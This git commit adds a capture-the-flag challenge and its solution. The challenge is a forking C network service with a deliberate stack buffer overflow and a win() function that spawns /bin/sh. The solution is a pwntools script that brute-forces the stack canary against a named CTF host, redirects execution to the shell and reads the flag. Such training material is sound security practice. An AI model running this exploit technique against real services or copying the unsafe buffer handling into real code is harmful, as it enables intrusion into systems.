Second CTFs part

This commit is contained in:
2026-05-10 20:42:33 +02:00
parent 5635246581
commit 9f240eba3b
87 changed files with 404506 additions and 0 deletions

Binary file not shown.

View File

@@ -0,0 +1,111 @@
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
static void die(const char *msg) {
perror(msg);
exit(1);
}
static void setup_stdio(void) {
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
}
__attribute__((used))
void win(void) {
system("/bin/sh");
}
__attribute__((noinline))
void vuln(void) {
char buf[128];
puts("Enter your signal log entry: ");
read(STDIN_FILENO, buf, 0x200);
}
__attribute__((noinline))
void handle_client(int fd) {
FILE *f = fdopen(fd, "r+");
if (!f) die("fdopen");
dup2(fd, 0); dup2(fd, 1); dup2(fd, 2);
setup_stdio();
puts("=== Lighthouse Control Panel ===");
puts("1) Record signal log");
puts("2) Disconnect");
printf("> ");
char choice[8];
if (!fgets(choice, sizeof choice, f)) return;
switch (choice[0]) {
case '1':
vuln();
puts("Log entry recorded. Over and out.");
return;
case '2':
puts("Disconnecting. Fair winds.");
return;
default:
puts("Unknown command. Disconnecting.");
break;
}
}
static void reap(int sig) {
(void)sig;
while (waitpid(-1, NULL, WNOHANG) > 0) {}
}
int main(int argc, char **argv) {
(void)argc; (void)argv;
setup_stdio();
signal(SIGCHLD, reap);
int port = 9001;
const char *env_port = getenv("PORT");
if (env_port) port = atoi(env_port);
int s = socket(AF_INET, SOCK_STREAM, 0);
if (s < 0) die("socket");
int one = 1;
setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
struct sockaddr_in addr = {0};
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_ANY);
addr.sin_port = htons((uint16_t)port);
if (bind(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) die("bind");
if (listen(s, 16) < 0) die("listen");
printf("[*] Lighthouse beacon active on port %d\n", port);
for (;;) {
struct sockaddr_in cli; socklen_t cl = sizeof cli;
int c = accept(s, (struct sockaddr *)&cli, &cl);
if (c < 0) {
if (errno == EINTR) continue;
die("accept");
}
pid_t pid = fork();
if (pid < 0) die("fork");
if (pid == 0) {
// Child
close(s);
handle_client(c);
close(c);
_exit(0);
}
close(c);
}
}

View File

@@ -0,0 +1,62 @@
#!/usr/bin/env python3
from pwn import *
CANARY_OFF = 136
elf = context.binary = ELF('./lighthouse', checksec=False)
#p = remote('127.0.0.1',9001)
#p = remote('offsec.m0lecon.it',13575)
HOST = 'offsec.m0lecon.it'
PORT = 13535
known = b"\x00"
for i in range(7):
for bval in range(256):
guess = known + bytes([bval])
payload = b"A" * CANARY_OFF + guess
io = remote(HOST, PORT, level='error')
io.recvuntil(b'>')
io.sendline(b'1')
#print(io.recvline())
io.recvuntil(b'entry: \n')
io.send(payload)
try:
data = io.recv(timeout=0.2)
except EOFError:
data = b""
io.close()
if b"Log entry recorded. Over and out." in data:
known = guess
log.success(f"byte {i+1}: {bval:02x}")
break
canary = u64(known)
#canary = 0xaa0f007629225000
log.info(f"Canary: {canary:#x}")
io = remote(HOST, PORT, level='error')
io.recvuntil(b'>')
io.sendline(b'1')
#print(io.recvline())
io.recvuntil(b'entry: \n')
payload = flat(
b'A' * (CANARY_OFF),
p64(canary),
b'B' * 8, #rbp,
p64(0x000000000040101a), #ret
p64(0x0000000000401630), #win
)
io.send(payload)
io.sendline(b'cat /home/user/flag')
print(io.recvline())
#io.recvline()
#p.recvline()
#p.recvline()